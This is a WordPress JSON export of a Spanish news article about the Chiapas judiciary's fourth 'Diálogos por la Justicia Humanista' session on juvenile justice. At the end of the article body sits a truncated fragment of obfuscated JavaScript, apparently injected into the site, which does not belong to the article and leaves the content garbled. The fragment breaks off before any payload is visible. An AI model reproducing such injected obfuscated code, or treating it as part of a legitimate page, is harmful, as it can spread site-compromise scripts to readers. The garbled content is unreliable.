{"id":20277,"date":"2025-02-10T05:34:18","date_gmt":"2025-02-10T05:34:18","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=20277"},"modified":"2025-02-10T05:34:18","modified_gmt":"2025-02-10T05:34:18","slug":"realiza-poder-judicial-la-cuarta-sesion-de-los-dialogos-por-la-justicia-humanista","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=20277","title":{"rendered":"Realiza Poder Judicial la cuarta sesi\u00f3n de los Di\u00e1logos por la Justicia Humanista"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"682\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250209-WA0037-1024x682.jpg\" alt=\"\" class=\"wp-image-20278\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250209-WA0037-1024x682.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250209-WA0037-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250209-WA0037-768x511.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250209-WA0037-310x205.jpg 310w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250209-WA0037.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>REDACCI\u00d3N.<\/p>\n\n\n\n<p>9 de febrero del 2025. Tuxtla Guti\u00e9rrez.- El Poder Judicial del Estado de Chiapas, que encabeza el magistrado presidente Juan Carlos Moreno Guill\u00e9n, llev\u00f3 a cabo la cuarta sesi\u00f3n de los Di\u00e1logos por la Justicia Humanista, Cap\u00edtulo Penal, con el tema general de Justicia Penal para Adolescentes.<\/p>\n\n\n\n<p>En este espacio, el magistrado presidente Moreno Guill\u00e9n celebr\u00f3 el compromiso de las y los juzgadores de participar y propiciar estos encuentros en donde se comparten criterios y opiniones sobre su quehacer judicial.<\/p>\n\n\n\n<p>\u201cNuestra misi\u00f3n es fortalecer la justicia en Chiapas, que las sentencias sean en apego a derecho para corresponder a la confianza que nos otorgan las y los chiapanecos, porque no hay que olvidarnos que la justicia es la paz\u201d, manifest\u00f3 Moreno Guill\u00e9n.<\/p>\n\n\n\n<p>En esta sesi\u00f3n, participaron las y los juzgadores especializados y adscritos a los distritos judiciales de Berrioz\u00e1bal, Mazat\u00e1n; las juezas y jueces de Control y Tribunales de Enjuiciamiento de Motozintla, Acapetahua, Carranza y Tonal\u00e1; adem\u00e1s del titular y las y los defensores p\u00fablicos del Instituto de la Defensor\u00eda P\u00fablica del Estado.<\/p>\n\n\n\n<p>Los cinco temas que se presentaron y comentaron fueron: Convalidaci\u00f3n de Actuaciones por parte de la autoridad Especializada en Justicia para Adolescentes, Aplicaci\u00f3n de Protocolos para salvaguardar el Derecho Humano al Inter\u00e9s Superior de las NNA, Reparaci\u00f3n del Da\u00f1o, Funciones de la Unidad Administrativa de Ejecuci\u00f3n de Medidas de Sanci\u00f3n y, por \u00faltimo, Especializaci\u00f3n de los Operadores del Sistema Especializado en Justicia para Adolescentes.<\/p>\n\n\n\n<p>En esta actividad estuvieron presentes, como moderadora la magistrada especializada en Justicia para Adolescentes, Mirna Camacho Pedrero; como relatora, la jueza especializada en Justicia para Adolescentes de Mazat\u00e1n, Jaqueline \u00c1ngel Juan; y el asesor en materia penal de Presidencia y enlace institucional con la Fiscal\u00eda General del Estado, Jos\u00e9 Eduardo Morales Montes.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>REDACCI\u00d3N. 9 de febrero del 2025. Tuxtla Guti\u00e9rrez.- El Poder Judicial del Estado de Chiapas, que encabeza el magistrado presidente Juan Carlos Moreno Guill\u00e9n, llev\u00f3 a cabo la cuarta sesi\u00f3n de los Di\u00e1logos por la Justicia Humanista, Cap\u00edtulo Penal, con el tema general de Justicia Penal para Adolescentes. En este espacio, el magistrado presidente Moreno &hellip;<\/p>\n","protected":false},"author":2,"featured_media":20278,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-20277","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20277","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=20277"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20277\/revisions"}],"predecessor-version":[{"id":20279,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20277\/revisions\/20279"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/20278"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=20277"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=20277"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=20277"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}